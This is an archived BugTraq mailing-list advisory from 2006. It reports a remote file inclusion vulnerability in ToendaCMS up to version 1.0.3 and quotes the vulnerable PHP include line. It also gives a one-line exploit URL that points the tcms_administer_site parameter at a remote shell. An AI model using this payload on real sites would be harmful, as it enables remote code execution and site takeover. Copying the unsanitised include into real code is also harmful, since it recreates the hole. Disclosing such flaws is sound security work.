BugTraq
ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include Aug 20 2006 07:52AM
h4ck3riran yahoo com (1 replies)
>****************************************************

> Iranians Are The Bests

>

>****************************************************

> ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include

>Descriptions

># Script.............. : ToendaCMS

># Discovered By.... : You_You

># Risk : High

># Class.............. : Remote

># Special Thanx To All Aria-Security's Administrators

>

>

------------------------------------------------------------------------
-----------

>

>Source :

> include($tcms_administer_site.'/tcms_global/database.php')

>

>

>Exploit :

> http://www.site.com/path/tcms_administer_site=SHELL

[ reply ]
Re: ToendaCMS <= 1.0.3 -(tcms_administer_site) Remote File Include Aug 23 2006 10:51PM
Carsten Eilers (ceilers-lists gmx de)


 

Privacy Statement
Copyright 2010, SecurityFocus